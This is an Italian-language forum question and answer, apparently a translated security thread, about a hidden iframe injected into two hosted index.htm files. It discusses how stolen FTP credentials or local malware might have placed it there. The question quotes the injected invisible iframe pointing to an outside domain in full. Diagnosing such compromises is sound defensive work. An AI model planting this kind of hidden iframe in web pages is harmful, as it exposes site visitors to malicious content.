Iframe hack / fatto tramite FTP?

0

Su due siti web che ospito per un amico, ho trovato un iframe in fondo al file index.htm di ciascun sito.

<iframe src="http://www.kunstsalen.dk"width=1height=1style="visibility: hidden; position: absolute;"></iframe>

Questo non è qualcosa che dovrebbe essere sulla sua home page. Sta facendo apparire un avviso di sicurezza nei browser che dice che il suo sito Web è un virus / sito infetto. Come ci è arrivato? Ha accesso FTP e entrambi i file sono stati modificati l'11/5/2011 all'incirca alla stessa ora. Potrebbe avere un virus che ha cambiato i suoi file index.htm locali e li ha caricati inconsapevolmente? Un virus può utilizzare le sue informazioni FTP salvate per accedere e modificare i file senza che lui sappia?

La ragione per cui presumo sia originata dalla sua macchina è perché ho oltre 500 altri file index.htm sul mio server e nessuno di loro è stato colpito. Solo i due file index.htm accessibili tramite il suo account FTP.

    
posta Rush Frisby 19.12.2011 - 22:04
fonte

1 risposta

2

Ci possono essere diversi scenari (difficili da capire senza saperne di più).

  1. Le tue credenziali FTP degli amici sono state rubate e qualcuno ha effettuato l'accesso e caricato versioni modificate di questi file. Questo può essere un keylogger su uno dei suoi computer (ad esempio)

  2. Le altre credenziali dei tuoi amici sono state rubate (e-mail?) e sono state utilizzate per accedere al sito web. Questo può essere l'accesso alla console di gestione e / di SSH.

  3. Il provider dei tuoi amici è stato violato e c'erano diversi clienti interessati

  4. Il tuo amico ha un virus sul suo computer che modifica file specifici (ad esempio * .php) aggiungendo questo iframe.

etc

    
risposta data 20.12.2011 - 11:13
fonte

Leggi altre domande sui tag